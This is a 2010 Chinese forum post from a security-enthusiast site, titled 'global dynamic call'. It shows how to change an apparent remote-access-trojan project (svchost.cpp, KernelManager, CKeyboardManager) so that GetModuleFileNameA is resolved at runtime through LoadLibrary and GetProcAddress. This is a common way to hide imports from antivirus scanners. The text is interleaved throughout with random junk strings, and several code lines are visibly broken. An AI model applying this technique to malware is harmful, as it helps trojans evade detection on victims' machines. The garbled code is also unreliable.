标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
( G. P. X, n5 Q5 [; |/ i l
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
. c4 Z( I8 m5 F
----------------------------------------
% f1 o4 w1 i m2 H) T
DTDY.h:
5 `1 V3 @4 V0 g) L- a
1 d0 @1 e7 C" s7 Y- D1 A3 J
#if _MSC_VER>1000
4 X: H6 T6 J* X% R$ x/ B
#pragma once
- x/ i8 v/ N* M2 o# U ~
#endif //_MSC_VER>1000
3 S0 W; X2 k6 H, f. X
#include<windows.h>
+ ?- N/ c1 x; s4 _
6 d. j* `1 ~- r! \: O9 ]
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
2 ]& U: ?0 n( D0 }; T
class DTDY
0 j7 N" j) N r9 n
{
6 D/ `8 u% n1 m1 ^* I: p' J- P) `
public:
, C b% d' G5 n, r8 A
DTDY();
: E1 p4 I p9 r& ?, L
virtual ~DTDY();
' Z/ V1 Z, B) j8 M: C. F( T4 m# v# e
public:
- u/ e# w: [" U; K$ p: n9 E
static pGetModuleFileNameA MyGetModuleFileName;
G# L# I, Y/ w$ I
static BOOL FunInitiallization();
" r) k" m' |! X1 B# \0 C
};
/ o: d Q. l2 m6 [) u
#endif
8 B# ]7 l/ c# ^ L; {7 W- h
----------------------------------------
5 ] V' S% }" j# S1 U: S
% r. V% {, f5 I E7 e
DTDY.cpp:
, q+ c4 v i$ W
- V- Z3 J4 V2 y0 O0 f
#include "DTDY.h"
1 I* K; o) v/ ~: m
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
4 c+ o) s/ Y- J ^
DTDY:TDY()
" [( _& M Z7 u8 o. P' C9 U
{
: U. ^9 T: J, L; H; Y9 @
}
2 \; \0 S! \, @* y" x' H" V- _
DTDY::~DTDY()
5 C. \3 y/ Z4 A6 P5 f/ v# G) g
{
7 P3 @7 O. o, U8 d
}
% q ~7 l$ l9 j& P& ~' }1 E2 {
BOOL DTDY::FunInitiallization()
% I6 c( W3 p1 R9 ]
{
0 K2 `1 ]' T- t, l& d
HMODULE hModule=LoadLibrary("kernel32.dll");
/ r. {+ S$ C. x% \6 L5 K
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
' o% K' b$ I! z6 A X
if(!MyGetModuleFileName=) return FALSE;
1 n9 p/ E8 ^% Q' ~7 c4 v) `
) h& ~, B8 X. O! ^9 l& P
return TRUE;
- I0 M( v3 V) Y
}
# F f B5 c; N) s0 F
----------------------------------------
# O1 F/ m+ _7 [! g8 K; ^
svchost.cpp:
3 A8 K! x, v# u; M$ U3 E' X$ y
. t. ?/ h/ ]6 U" |! v9 e
#include "DTDY.h"
9 E9 [7 o* O) G& L5 |& p# V! R
6 @ L' K* _# X$ E
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
8 f) G# y3 X' G; z5 `' ^' g
{
- Q. F3 \" p8 F- G4 e
switch(ul_reason_for_call)
7 b. y% d9 h( s. P3 [ g( d
{
- ^& k- G ^6 h {6 i& _
case DLL_PROCESS_ATTACH:
+ v. q3 a; ^2 i2 z c8 S& @: F
if(!DTDY::FunInitiallization()) return FALSE;
# F7 w! X$ c: F5 P O
7 Q) k5 x, H) I' W, Y% k1 e2 o1 n
break;
- |- z6 v; m2 n7 K
}
& m( V k4 B, y9 j" h5 E, {
}
1 _( b: c m) O9 l
4 I3 w1 m. ? Y m L. q
: m& R% o6 k6 |; _
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
r: N' z3 r; B: X W
改写为
# w% C& P. T" M; C7 U3 P
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
7 F1 T8 n- j7 c: C$ I" \/ e, l4 d
----------------------------------------
! r. G0 g% n# z+ f4 r3 `6 W
KernelManager.cpp:
% s3 ^ S) D; M" ~" b8 [* W9 @$ A
6 t- x2 [1 V8 f+ R# ?: s
#include "../DTDY.h"
7 L' t( `5 @% e$ x; }
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
2 I6 B. R! f- P$ e0 d! c- N
改写为
5 o& t" f, C# _1 b" ~( Q
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
9 Z$ B' x! {2 m4 H9 j# n* y! _
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
